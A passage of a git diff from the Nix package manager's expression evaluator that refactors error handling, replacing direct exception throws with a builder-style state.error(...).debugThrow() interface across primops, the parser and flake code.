+2,7 @@ ///@file #include "attr-set.hh" +#include "eval-error.hh" #include "types.hh" #include "value.hh" #include "nixexpr.hh" @@ -151,45 +152,6 @@ struct DebugTrace { bool isError; }; -void debugError(Error * e, Env & env, Expr & expr); - -class ErrorBuilder -{ - private: - EvalState & state; - ErrorInfo info; - - ErrorBuilder(EvalState & s, ErrorInfo && i): state(s), info(i) { } - - public: - template - [[nodiscard, gnu::noinline]] - static ErrorBuilder * create(EvalState & s, const Args & ... args) - { - return new ErrorBuilder(s, ErrorInfo { .msg = hintfmt(args...) }); - } - - [[nodiscard, gnu::noinline]] - ErrorBuilder & atPos(PosIdx pos); - - [[nodiscard, gnu::noinline]] - ErrorBuilder & withTrace(PosIdx pos, const std::string_view text); - - [[nodiscard, gnu::noinline]] - ErrorBuilder & withFrameTrace(PosIdx pos, const std::string_view text); - - [[nodiscard, gnu::noinline]] - ErrorBuilder & withSuggestions(Suggestions & s); - - [[nodiscard, gnu::noinline]] - ErrorBuilder & withFrame(const Env & e, const Expr & ex); - - template - [[gnu::noinline, gnu::noreturn]] - void debugThrow(); -}; - - class EvalState : public std::enable_shared_from_this { public: @@ -274,39 +236,10 @@ public: void runDebugRepl(const Error * error, const Env & env, const Expr & expr); - template - [[gnu::noinline, gnu::noreturn]] - void debugThrowLastTrace(E && error) - { - debugThrow(error, nullptr, nullptr); - } - - template - [[gnu::noinline, gnu::noreturn]] - void debugThrow(E && error, const Env * env, const Expr * expr) - { - if (debugRepl && ((env && expr) || !debugTraces.empty())) { - if (!env || !expr) { - const DebugTrace & last = debugTraces.front(); - env = &last.env; - expr = &last.expr; - } - runDebugRepl(&error, *env, *expr); - } - - throw std::move(error); - } - - // This is dangerous, but gets in line with the idea that error creation and - // throwing should not allocate on the stack of hot functions. - // as long as errors are immediately thrown, it works. - ErrorBuilder * errorBuilder; - - template + template [[nodiscard, gnu::noinline]] - ErrorBuilder & error(const Args & ... args) { - errorBuilder = ErrorBuilder::create(*this, args...); - return *errorBuilder; + EvalErrorBuilder & error(const Args & ... args) { + return *new EvalErrorBuilder(*this, args...); } private: @@ -845,22 +778,6 @@ SourcePath resolveExprPath(SourcePath path); */ bool isAllowedURI(std::string_view uri, const Strings & allowedPaths); -struct InvalidPathError : EvalError -{ - Path path; - InvalidPathError(const Path & path); -#ifdef EXCEPTION_NEEDS_THROW_SPEC - ~InvalidPathError() throw () { }; -#endif -}; - -template -void ErrorBuilder::debugThrow() -{ - // NOTE: We always use the -LastTrace version as we push the new trace in withFrame() - state.debugThrowLastTrace(ErrorType(info)); -} - } #include "eval-inline.hh" diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc index fee58792b..3396b0219 100644 --- a/src/libexpr/flake/flake.cc +++ b/src/libexpr/flake/flake.cc @@ -147,8 +147,8 @@ static FlakeInput parseFlakeInput(EvalState & state, NixStringContext emptyContext = {}; attrs.emplace(state.symbols[attr.name], printValueAsJSON(state, true, *attr.value, pos, emptyContext).dump()); } else - throw TypeError("flake input attribute '%s' is %s while a string, Boolean, or integer is expected", - state.symbols[attr.name], showType(*attr.value)); + state.error("flake input attribute '%s' is %s while a string, Boolean, or integer is expected", + state.symbols[attr.name], showType(*attr.value)).debugThrow(); } #pragma GCC diagnostic pop } @@ -295,15 +295,15 @@ static Flake getFlake( std::vector ss; for (auto elem : setting.value->listItems()) { if (elem->type() != nString) - throw TypeError("list element in flake configuration setting '%s' is %s while a string is expected", - state.symbols[setting.name], showType(*setting.value)); + state.error("list element in flake configuration setting '%s' is %s while a string is expected", + state.symbols[setting.name], showType(*setting.value)).debugThrow(); ss.emplace_back(state.forceStringNoCtx(*elem, setting.pos, "")); } flake.config.settings.emplace(state.symbols[setting.name], ss); } else - throw TypeError("flake configuration setting '%s' is %s", - state.symbols[setting.name], showType(*setting.value)); + state.error("flake configuration setting '%s' is %s", + state.symbols[setting.name], showType(*setting.value)).debugThrow(); } } @@ -865,11 +865,11 @@ static void prim_flakeRefToString( attrs.emplace(state.symbols[attr.name], std::string(attr.value->string_view())); } else { - state.error( + state.error( "flake reference attribute sets may only contain integers, Booleans, " "and strings, but attribute '%s' is %s", state.symbols[attr.name], - showType(*attr.value)).debugThrow(); + showType(*attr.value)).debugThrow(); } } auto flakeRef = FlakeRef::fromAttrs(attrs); diff --git a/src/libexpr/get-drvs.cc b/src/libexpr/get-drvs.cc index 51449ccb3..e9ed1ef08 100644 --- a/src/libexpr/get-drvs.cc +++ b/src/libexpr/get-drvs.cc @@ -49,7 +49,7 @@ std::string PackageInfo::queryName() const { if (name == "" && attrs) { auto i = attrs->find(state->sName); - if (i == attrs->end()) throw TypeError("derivation name missing"); + if (i == attrs->end()) state->error("derivation name missing").debugThrow(); name = state->forceStringNoCtx(*i->value, noPos, "while evaluating the 'name' attribute of a derivation"); } return name; @@ -396,7 +396,8 @@ static void getDerivations(EvalState & state, Value & vIn, } } - else throw TypeError("expression does not evaluate to a derivation (or a set or list of those)"); + else + state.error("expression does not evaluate to a derivation (or a set or list of those)").debugThrow(); } diff --git a/src/libexpr/json-to-value.cc b/src/libexpr/json-to-value.cc index 99a475ff9..2d12c47c5 100644 --- a/src/libexpr/json-to-value.cc +++ b/src/libexpr/json-to-value.cc @@ -1,4 +1,6 @@ #include "json-to-value.hh" +#include "value.hh" +#include "eval.hh" #include #include @@ -159,7 +161,7 @@ public: } bool parse_error(std::size_t, const std::string&, const nlohmann::detail::exception& ex) { - throw JSONParseError(ex.what()); + throw JSONParseError("%s", ex.what()); } }; diff --git a/src/libexpr/json-to-value.hh b/src/libexpr/json-to-value.hh index 3b8ec000f..3c8fa5cc0 100644 --- a/src/libexpr/json-to-value.hh +++ b/src/libexpr/json-to-value.hh @@ -1,13 +1,16 @@ #pragma once ///@file -#include "eval.hh" +#include "error.hh" #include namespace nix { -MakeError(JSONParseError, EvalError); +class EvalState; +struct Value; + +MakeError(JSONParseError, Error); void parseJSON(EvalState & state, const std::string_view & s, Value & v); diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index d7a0b5048..af67e847d 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -146,9 +146,9 @@ or { return OR_KW; } try { yylval->n = boost::lexical_cast(yytext); } catch (const boost::bad_lexical_cast &) { - throw ParseError({ + throw ParseError(ErrorInfo{ .msg = hintfmt("invalid integer '%1%'", yytext), - .errPos = state->positions[CUR_POS], + .pos = state->positions[CUR_POS], }); } return INT_LIT; @@ -156,9 +156,9 @@ or { return OR_KW; } {FLOAT} { errno = 0; yylval->nf = strtod(yytext, 0); if (errno != 0) - throw ParseError({ + throw ParseError(ErrorInfo{ .msg = hintfmt("invalid float '%1%'", yytext), - .errPos = state->positions[CUR_POS], + .pos = state->positions[CUR_POS], }); return FLOAT_LIT; } @@ -285,9 +285,9 @@ or { return OR_KW; } {ANY} | <> { - throw ParseError({ + throw ParseError(ErrorInfo{ .msg = hintfmt("path has a trailing slash"), - .errPos = state->positions[CUR_POS], + .pos = state->positions[CUR_POS], }); } diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index 6fe4ba81b..6b8f33c42 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -296,10 +296,10 @@ void ExprVar::bindVars(EvalState & es, const std::shared_ptr & enclosing `with'. If there is no `with', then we can issue an "undefined variable" error now. */ if (withLevel == -1) - throw UndefinedVarError({ - .msg = hintfmt("undefined variable '%1%'", es.symbols[name]), - .errPos = es.positions[pos] - }); + es.error( + "undefined variable '%1%'", + es.symbols[name] + ).atPos(pos).debugThrow(); for (auto * e = env.get(); e && !fromWith; e = e->up) fromWith = e->isWith; this->level = withLevel; diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index da0ec6e9d..1f944f10b 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -9,28 +9,13 @@ #include "error.hh" #include "chunked-vector.hh" #include "position.hh" +#include "eval-error.hh" #include "pos-idx.hh" #include "pos-table.hh" namespace nix { -MakeError(EvalError, Error); -MakeError(ParseError, Error); -MakeError(AssertionError, EvalError); -MakeError(ThrownError, AssertionError); -MakeError(Abort, EvalError); -MakeError(TypeError, EvalError); -MakeError(UndefinedVarError, Error); -MakeError(MissingArgumentError, EvalError); - -class InfiniteRecursionError : public EvalError -{ - friend class EvalState; -public: - using EvalError::EvalError; -}; - struct Env; struct Value; class EvalState; diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh index 0a9f076dc..bdd5bbabe 100644 --- a/src/libexpr/parser-state.hh +++ b/src/libexpr/parser-state.hh @@ -66,7 +66,7 @@ inline void ParserState::dupAttr(const AttrPath & attrPath, const PosIdx pos, co throw ParseError({ .msg = hintfmt("attribute '%1%' already defined at %2%", showAttrPath(symbols, attrPath), positions[prevPos]), - .errPos = positions[pos] + .pos = positions[pos] }); } @@ -74,7 +74,7 @@ inline void ParserState::dupAttr(Symbol attr, const PosIdx pos, const PosIdx pre { throw ParseError({ .msg = hintfmt("attribute '%1%' already defined at %2%", symbols[attr], positions[prevPos]), - .errPos = positions[pos] + .pos = positions[pos] }); } @@ -155,13 +155,13 @@ inline Formals * ParserState::validateFormals(Formals * formals, PosIdx pos, Sym if (duplicate) throw ParseError({ .msg = hintfmt("duplicate formal function argument '%1%'", symbols[duplicate->first]), - .errPos = positions[duplicate->second] + .pos = positions[duplicate->second] }); if (arg && formals->has(arg)) throw ParseError({ .msg = hintfmt("duplicate formal function argument '%1%'", symbols[arg]), - .errPos = positions[pos] + .pos = positions[pos] }); return formals; diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index e95da37f7..95f45c80a 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -66,7 +66,7 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char * { throw ParseError({ .msg = hintfmt(error), - .errPos = state->positions[state->at(*loc)] + .pos = state->positions[state->at(*loc)] }); } @@ -155,7 +155,7 @@ expr_function { if (!$2->dynamicAttrs.empty()) throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in let"), - .errPos = state->positions[CUR_POS] + .pos = state->positions[CUR_POS] }); $$ = new ExprLet($2, $4); } @@ -245,7 +245,7 @@ expr_simple if (noURLLiterals) throw ParseError({ .msg = hintfmt("URL literals are disabled"), - .errPos = state->positions[CUR_POS] + .pos = state->positions[CUR_POS] }); $$ = new ExprString(std::string($1)); } @@ -341,7 +341,7 @@ attrs } else throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in inherit"), - .errPos = state->positions[state->at(@2)] + .pos = state->positions[state->at(@2)] }); } | { $$ = new AttrPath; } diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 1197b6e13..1eec6f961 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -39,10 +39,6 @@ namespace nix { * Miscellaneous *************************************************************/ - -InvalidPathError::InvalidPathError(const Path & path) : - EvalError("path '%s' is not valid", path), path(path) {} - StringMap EvalState::realiseContext(const NixStringContext & context) { std::vector drvs; @@ -51,7 +47,7 @@ StringMap EvalState::realiseContext(const NixStringContext & context) for (auto & c : context) { auto ensureValid = [&](const StorePath & p) { if (!store->isValidPath(p)) - debugThrowLastTrace(InvalidPathError(store->printStorePath(p))); + error(store->printStorePath(p)).debugThrow(); }; std::visit(overloaded { [&](const NixStringContextElem::Built & b) { @@ -78,9 +74,10 @@ StringMap EvalState::realiseContext(const NixStringContext & context) if (drvs.empty()) return {}; if (!evalSettings.enableImportFromDerivation) - debugThrowLastTrace(Error( + error( "cannot build '%1%' during evaluation because the option 'allow-import-from-derivation' is disabled", - drvs.begin()->to_string(*store))); + drvs.begin()->to_string(*store) + ).debugThrow(); /* Build/substitute the context. */ std::vector buildReqs; @@ -340,16 +337,16 @@ void prim_importNative(EvalState & state, const PosIdx pos, Value * * args, Valu void *handle = dlopen(path.path.c_str(), RTLD_LAZY | RTLD_LOCAL); if (!handle) - state.debugThrowLastTrace(EvalError("could not open '%1%': %2%", path, dlerror())); + state.error("could not open '%1%': %2%", path, dlerror()).debugThrow(); dlerror(); ValueInitializer func = (ValueInitializer) dlsym(handle, sym.c_str()); if(!func) { char *message = dlerror(); if (message) - state.debugThrowLastTrace(EvalError("could not load symbol '%1%' from '%2%': %3%", sym, path, message)); + state.error("could not load symbol '%1%' from '%2%': %3%", sym, path, message).debugThrow(); else - state.debugThrowLastTrace(EvalError("symbol '%1%' from '%2%' resolved to NULL when a function pointer was expected", sym, path)); + state.error("symbol '%1%' from '%2%' resolved to NULL when a function pointer was expected", sym, path).debugThrow(); } (func)(state, v); @@ -365,7 +362,7 @@ void prim_exec(EvalState & state, const PosIdx pos, Value * * args, Value & v) auto elems = args[0]->listElems(); auto count = args[0]->listSize(); if (count == 0) - state.error("at least one argument to 'exec' required").atPos(pos).debugThrow(); + state.error("at least one argument to 'exec' required").atPos(pos).debugThrow(); NixStringContext context; auto program = state.coerceToString(pos, *elems[0], context, "while evaluating the first element of the argument passed to builtins.exec", @@ -380,7 +377,7 @@ void prim_exec(EvalState & state, const PosIdx pos, Value * * args, Value & v) try { auto _ = state.realiseContext(context); // FIXME: Handle CA derivations } catch (InvalidPathError & e) { - state.error("cannot execute '%1%', since path '%2%' is not valid", program, e.path).atPos(pos).debugThrow(); + state.error("cannot execute '%1%', since path '%2%' is not valid", program, e.path).atPos(pos).debugThrow(); } auto output = runProgram(program, true, commandArgs); @@ -582,7 +579,7 @@ struct CompareValues if (v1->type() == nInt && v2->type() == nFloat) return v1->integer < v2->fpoint; if (v1->type() != v2->type()) - state.error("cannot compare %s with %s", showType(*v1), showType(*v2)).debugThrow(); + state.error("cannot compare %s with %s", showType(*v1), showType(*v2)).debugThrow(); // Allow selecting a subset of enum values #pragma GCC diagnostic push #pragma GCC diagnostic ignored "-Wswitch-enum" @@ -610,7 +607,7 @@ struct CompareValues } } default: - state.error("cannot compare %s with %s; values of that type are incomparable", showType(*v1), showType(*v2)).debugThrow(); + state.error("cannot compare %s with %s; values of that type are incomparable", showType(*v1), showType(*v2)).debugThrow(); #pragma GCC diagnostic pop } } catch (Error & e) { @@ -637,7 +634,7 @@ static Bindings::iterator getAttr( { Bindings::iterator value = attrSet->find(attrSym); if (value == attrSet->end()) { - state.error("attribute '%s' missing", state.symbols[attrSym]).withTrace(noPos, errorCtx).debugThrow(); + state.error("attribute '%s' missing", state.symbols[attrSym]).withTrace(noPos, errorCtx).debugThrow(); } return value; } @@ -758,7 +755,7 @@ static RegisterPrimOp primop_break({ auto error = Error(ErrorInfo { .level = lvlInfo, .msg = hintfmt("breakpoint reached"), - .errPos = state.positions[pos], + .pos = state.positions[pos], }); auto & dt = state.debugTraces.front(); @@ -769,7 +766,7 @@ static RegisterPrimOp primop_break({ throw Error(ErrorInfo{ .level = lvlInfo, .msg = hintfmt("quit the debugger"), - .errPos = nullptr, + .pos = nullptr, }); } } @@ -790,7 +787,7 @@ static RegisterPrimOp primop_abort({ NixStringContext context; auto s = state.coerceToString(pos, *args[0], context, "while evaluating the error message passed to builtins.abort").toOwned(); - state.debugThrowLastTrace(Abort("evaluation aborted with the following error message: '%1%'", s)); + state.error("evaluation aborted with the following error message: '%1%'", s).debugThrow(); } }); @@ -809,7 +806,7 @@ static RegisterPrimOp primop_throw({ NixStringContext context; auto s = state.coerceToString(pos, *args[0], context, "while evaluating the error message passed to builtin.throw").toOwned(); - state.debugThrowLastTrace(ThrownError(s)); + state.error(s).debugThrow(); } }); @@ -1128,37 +1125,33 @@ drvName, Bindings * attrs, Value & v) experimentalFeatureSettings.require(Xp::DynamicDerivations); ingestionMethod = TextIngestionMethod {}; } else - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("invalid value '%s' for 'outputHashMode' attribute", s), - .errPos = state.positions[noPos] - })); + state.error( + "invalid value '%s' for 'outputHashMode' attribute", s + ).atPos(v).debugThrow(); }; auto handleOutputs = [&](const Strings & ss) { outputs.clear(); for (auto & j : ss) { if (outputs.find(j) != outputs.end()) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("duplicate derivation output '%1%'", j), - .errPos = state.positions[noPos] - })); + state.error("duplicate derivation output '%1%'", j) + .atPos(v) + .debugThrow(); /* !!! Check whether j is a valid attribute name. */ /* Derivations cannot be named ‘drv’, because then we'd have an attribute ‘drvPath’ in the resulting set. */ if (j == "drv") - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("invalid derivation output name 'drv'" ), - .errPos = state.positions[noPos] - })); + state.error("invalid derivation output name 'drv'") + .atPos(v) + .debugThrow(); outputs.insert(j); } if (outputs.empty()) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("derivation cannot have an empty set of outputs"), - .errPos = state.positions[noPos] - })); + state.error("derivation cannot have an empty set of outputs") + .atPos(v) + .debugThrow(); }; try { @@ -1281,16 +1274,14 @@ drvName, Bindings * attrs, Value & v) /* Do we have all required attributes? */ if (drv.builder == "") - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("required attribute 'builder' missing"), - .errPos = state.positions[noPos] - })); + state.error("required attribute 'builder' missing") + .atPos(v) + .debugThrow(); if (drv.platform == "") - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("required attribute 'system' missing"), - .errPos = state.positions[noPos] - })); + state.error("required attribute 'system' missing") + .atPos(v) + .debugThrow(); /* Check whether the derivation name is valid. */ if (isDerivation(drvName) && @@ -1298,10 +1289,10 @@ drvName, Bindings * attrs, Value & v) outputs.size() == 1 && *(outputs.begin()) == "out")) { - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("derivation names are allowed to end in '%s' only if they produce a single derivation file", drvExtension), - .errPos = state.positions[noPos] - })); + state.error( + "derivation names are allowed to end in '%s' only if they produce a single derivation file", + drvExtension + ).atPos(v).debugThrow(); } if (outputHash) { @@ -1310,10 +1301,9 @@ drvName, Bindings * attrs, Value & v) Ignore `__contentAddressed` because fixed output derivations are already content addressed. */ if (outputs.size() != 1 || *(outputs.begin()) != "out") - state.debugThrowLastTrace(Error({ - .msg = hintfmt("multiple outputs are not supported in fixed-output derivations"), - .errPos = state.positions[noPos] - })); + state.error( + "multiple outputs are not supported in fixed-output derivations" + ).atPos(v).debugThrow(); auto h = newHashAllowEmpty(*outputHash, parseHashAlgoOpt(outputHashAlgo)); @@ -1332,10 +1322,8 @@ drvName, Bindings * attrs, Value & v) else if (contentAddressed || isImpure) { if (contentAddressed && isImpure) - throw EvalError({ - .msg = hintfmt("derivation cannot be both content-addressed and impure"), - .errPos = state.positions[noPos] - }); + state.error("derivation cannot be both content-addressed and impure") + .atPos(v).debugThrow(); auto ha = parseHashAlgoOpt(outputHashAlgo).value_or(HashAlgorithm::SHA256); auto method = ingestionMethod.value_or(FileIngestionMethod::Recursive); @@ -1376,10 +1364,10 @@ drvName, Bindings * attrs, Value & v) for (auto & i : outputs) { auto h = get(hashModulo.hashes, i); if (!h) - throw AssertionError({ - .msg = hintfmt("derivation produced no hash for output '%s'", i), - .errPos = state.positions[noPos], - }); + state.error( + "derivation produced no hash for output '%s'", + i + ).atPos(v).debugThrow(); auto outPath = state.store->makeOutputPath(i, *h, drvName); drv.env[i] = state.store->printStorePath(outPath); drv.outputs.insert_or_assign( @@ -1485,10 +1473,10 @@ static RegisterPrimOp primop_toPath({ static void prim_storePath(EvalState & state, const PosIdx pos, Value * * args, Value & v) { if (evalSettings.pureEval) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("'%s' is not allowed in pure evaluation mode", "builtins.storePath"), - .errPos = state.positions[pos] - })); + state.error( + "'%s' is not allowed in pure evaluation mode", + "builtins.storePath" + ).atPos(pos).debugThrow(); NixStringContext context; auto path = state.coerceToPath(pos, *args[0], context, "while evaluating the first argument passed to 'builtins.storePath'").path; @@ -1498,10 +1486,8 @@ static void prim_storePath(EvalState & state, const PosIdx pos, Value * * args, if (!state.store->isStorePath(path.abs())) path = CanonPath(canonPath(path.abs(), true)); if (!state.store->isInStore(path.abs())) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("path '%1%' is not in the Nix store", path), - .errPos = state.positions[pos] - })); + state.error("path '%1%' is not in the Nix store", path) + .atPos(pos).debugThrow(); auto path2 = state.store->toStorePath(path.abs()).first; if (!settings.readOnlyMode) state.store->ensurePath(path2); @@ -1616,7 +1602,10 @@ static void prim_readFile(EvalState & state, const PosIdx pos, Value * * args, V auto path = realisePath(state, pos, *args[0]); auto s = path.readFile(); if (s.find((char) 0) != std::string::npos) - state.debugThrowLastTrace(Error("the contents of the file '%1%' cannot be represented as a Nix string", path)); + state.error( + "the contents of the file '%1%' cannot be represented as a Nix string", + path + ).atPos(pos).debugThrow(); StorePathSet refs; if (state.store->isInStore(path.path.abs())) { try { @@ -1673,10 +1662,11 @@ static void prim_findFile(EvalState & state, const PosIdx pos, Value * * args, V auto rewrites = state.realiseContext(context); path = rewriteStrings(path, rewrites); } catch (InvalidPathError & e) { - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("cannot find '%1%', since path '%2%' is not valid", path, e.path), - .errPos = state.positions[pos] - })); + state.error( + "cannot find '%1%', since path '%2%' is not valid", + path, + e.path + ).atPos(pos).debugThrow(); } searchPath.elements.emplace_back(SearchPath::Elem { @@ -1745,10 +1735,7 @@ static void prim_hashFile(EvalState & state, const PosIdx pos, Value * * args, V auto algo = state.forceStringNoCtx(*args[0], pos, "while evaluating the first argument passed to builtins.hashFile"); std::optional ha = parseHashAlgo(algo); if (!ha) - state.debugThrowLastTrace(Error({ - .msg = hintfmt("unknown hash algo '%1%'", algo), - .errPos = state.positions[pos] - })); + state.error("unknown hash algorithm '%1%'", algo).atPos(pos).debugThrow(); auto path = realisePath(state, pos, *args[1]); @@ -2068,13 +2055,12 @@ static void prim_toFile(EvalState & state, const PosIdx pos, Value * * args, Val if (auto p = std::get_if(&c.raw)) refs.insert(p->path); else - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt( - "in 'toFile': the file named '%1%' must not contain a reference " - "to a derivation but contains (%2%)", - name, c.to_string()), - .errPos = state.positions[pos] - })); + state.error( + "files created by %1% may not reference derivations, but %2% references %3%", + "builtins.toFile", + name, + c.to_string() + ).atPos(pos).debugThrow(); } auto storePath = settings.readOnlyMode @@ -2243,7 +2229,10 @@ static void addPath( if (!expectedHash || !state.store->isValidPath(*expectedStorePath)) { auto dstPath = fetchToStore(*state.store, path.resolveSymlinks(), name, method, filter.get(), state.repair); if (expectedHash && expectedStorePath != dstPath) - state.debugThrowLastTrace(Error("store path mismatch in (possibly filtered) path added from '%s'", path)); + state.error( + "store path mismatch in (possibly filtered) path added from '%s'", + path + ).atPos(pos).debugThrow(); state.allowAndSetStorePathString(dstPath, v); } else state.allowAndSetStorePathString(*expectedStorePath, v); @@ -2343,16 +2332,15 @@ static void prim_path(EvalState & state, const PosIdx pos, Value * * args, Value else if (n == "sha256") expectedHash = newHashAllowEmpty(state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the `sha256` attribute passed to builtins.path"), HashAlgorithm::SHA256); else - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("unsupported argument '%1%' to 'addPath'", state.symbols[attr.name]), - .errPos = state.positions[attr.pos] - })); + state.error( + "unsupported argument '%1%' to 'addPath'", + state.symbols[attr.name] + ).atPos(attr.pos).debugThrow(); } if (!path) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("missing required 'path' attribute in the first argument to builtins.path"), - .errPos = state.positions[pos] - })); + state.error( + "missing required 'path' attribute in the first argument to builtins.path" + ).atPos(pos).debugThrow(); if (name.empty()) name = path->baseName(); @@ -2770,10 +2758,7 @@ static void prim_functionArgs(EvalState & state, const PosIdx pos, Value * * arg return; } if (!args[0]->isLambda()) - state.debugThrowLastTrace(TypeError({ - .msg = hintfmt("'functionArgs' requires a function"), - .errPos = state.positions[pos] - })); + state.error("'functionArgs' requires a function").atPos(pos).debugThrow(); if (!args[0]->lambda.fun->hasFormals()) { v.mkAttrs(&state.emptyBindings); @@ -2943,10 +2928,10 @@ static void elemAt(EvalState & state, const PosIdx pos, Value & list, int n, Val { state.forceList(list, pos, "while evaluating the first argument passed to builtins.elemAt"); if (n < 0 || (unsigned int) n >= list.listSize()) - state.debugThrowLastTrace(Error({ - .msg = hintfmt("list index %1% is out of bounds", n), - .errPos = state.positions[pos] - })); + state.error( + "list index %1% is out of bounds", + n + ).atPos(pos).debugThrow(); state.forceValue(*list.listElems()[n], pos); v = *list.listElems()[n]; } @@ -2991,10 +2976,7 @@ static void prim_tail(EvalState & state, const PosIdx pos, Value * * args, Value { state.forceList(*args[0], pos, "while evaluating the first argument passed to builtins.tail"); if (args[0]->listSize() == 0) - state.debugThrowLastTrace(Error({ - .msg = hintfmt("'tail' called on an empty list"), - .errPos = state.positions[pos] - })); + state.error("'tail' called on an empty list").atPos(pos).debugThrow(); state.mkList(v, args[0]->listSize() - 1); for (unsigned int n = 0; n < v.listSize(); ++n) @@ -3251,7 +3233,7 @@ static void prim_genList(EvalState & state, const PosIdx pos, Value * * args, Va auto len = state.forceInt(*args[1], pos, "while evaluating the second argument passed to builtins.genList"); if (len < 0) - state.error("cannot create list of size %1%", len).debugThrow(); + state.error("cannot create list of size %1%", len).atPos(pos).debugThrow(); // More strict than striclty (!) necessary, but acceptable // as evaluating map without accessing any values makes little sense. @@ -3568,10 +3550,7 @@ static void prim_div(EvalState & state, const PosIdx pos, Value * * args, Value NixFloat f2 = state.forceFloat(*args[1], pos, "while evaluating the second operand of the division"); if (f2 == 0) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("division by zero"), - .errPos = state.positions[pos] - })); + state.error("division by zero").atPos(pos).debugThrow(); if (args[0]->type() == nFloat || args[1]->type() == nFloat) { v.mkFloat(state.forceFloat(*args[0], pos, "while evaluating the first operand of the division") / f2); @@ -3580,10 +3559,7 @@ static void prim_div(EvalState & state, const PosIdx pos, Value * * args, Value NixInt i2 = state.forceInt(*args[1], pos, "while evaluating the second operand of the division"); /* Avoid division overflow as it might raise SIGFPE. */ if (i1 == std::numeric_limits::min() && i2 == -1) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("overflow in integer division"), - .errPos = state.positions[pos] - })); + state.error("overflow in integer division").atPos(pos).debugThrow(); v.mkInt(i1 / i2); } @@ -3714,10 +3690,7 @@ static void prim_substring(EvalState & state, const PosIdx pos, Value * * args, int start = state.forceInt(*args[0], pos, "while evaluating the first argument (the start offset) passed to builtins.substring"); if (start < 0) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("negative start position in 'substring'"), - .errPos = state.positions[pos] - })); + state.error("negative start position in 'substring'").atPos(pos).debugThrow(); int len = state.forceInt(*args[1], pos, "while evaluating the second argument (the substring length) passed to builtins.substring"); @@ -3782,10 +3755,7 @@ static void prim_hashString(EvalState & state, const PosIdx pos, Value * * args, auto algo = state.forceStringNoCtx(*args[0], pos, "while evaluating the first argument passed to builtins.hashString"); std::optional ha = parseHashAlgo(algo); if (!ha) - state.debugThrowLastTrace(Error({ - .msg = hintfmt("unknown hash algo '%1%'", algo), - .errPos = state.positions[pos] - })); + state.error("unknown hash algorithm '%1%'", algo).atPos(pos).debugThrow(); NixStringContext context; // discarded auto s = state.forceString(*args[1], context, pos, "while evaluating the second argument passed to builtins.hashString"); @@ -3951,15 +3921,13 @@ void prim_match(EvalState & state, const PosIdx pos, Value * * args, Value & v) } catch (std::regex_error & e) { if (e.code() == std::regex_constants::error_space) { // limit is _GLIBCXX_REGEX_STATE_LIMIT for libstdc++ - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("memory limit exceeded by regular expression '%s'", re), - .errPos = state.positions[pos] - })); + state.error("memory limit exceeded by regular expression '%s'", re) + .atPos(pos) + .debugThrow(); } else - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("invalid regular expression '%s'", re), - .errPos = state.positions[pos] - })); + state.error("invalid regular expression '%s'", re) + .atPos(pos) + .debugThrow(); } } @@ -4055,15 +4023,13 @@ void prim_split(EvalState & state, const PosIdx pos, Value * * args, Value & v) } catch (std::regex_error & e) { if (e.code() == std::regex_constants::error_space) { // limit is _GLIBCXX_REGEX_STATE_LIMIT for libstdc++ - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("memory limit exceeded by regular expression '%s'", re), - .errPos = state.positions[pos] - })); + state.error("memory limit exceeded by regular expression '%s'", re) + .atPos(pos) + .debugThrow(); } else - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("invalid regular expression '%s'", re), - .errPos = state.positions[pos] - })); + state.error("invalid regular expression '%s'", re) + .atPos(pos) + .debugThrow(); } } @@ -4139,7 +4105,9 @@ static void prim_replaceStrings(EvalState & state, const PosIdx pos, Value * * a state.forceList(*args[0], pos, "while evaluating the first argument passed to builtins.replaceStrings"); state.forceList(*args[1], pos, "while evaluating the second argument passed to builtins.replaceStrings"); if (args[0]->listSize() != args[1]->listSize()) - state.error("'from' and 'to' arguments passed to builtins.replaceStrings have different lengths").atPos(pos).debugThrow(); + state.error( + "'from' and 'to' arguments passed to builtins.replaceStrings have different lengths" + ).atPos(pos).debugThrow(); std::vector from; from.reserve(args[0]->listSize()); diff --git a/src/libexpr/primops/context.cc b/src/libexpr/primops/context.cc index db940f277..1eec8b316 100644 --- a/src/libexpr/primops/context.cc +++ b/src/libexpr/primops/context.cc @@ -98,30 +98,30 @@ static void prim_addDrvOutputDependencies(EvalState & state, const PosIdx pos, V auto contextSize = context.size(); if (contextSize != 1) { - throw EvalError({ - .msg = hintfmt("context of string '%s' must have exactly one element, but has %d", *s, contextSize), - .errPos = state.positions[pos] - }); + state.error( + "context of string '%s' must have exactly one element, but has %d", + *s, + contextSize + 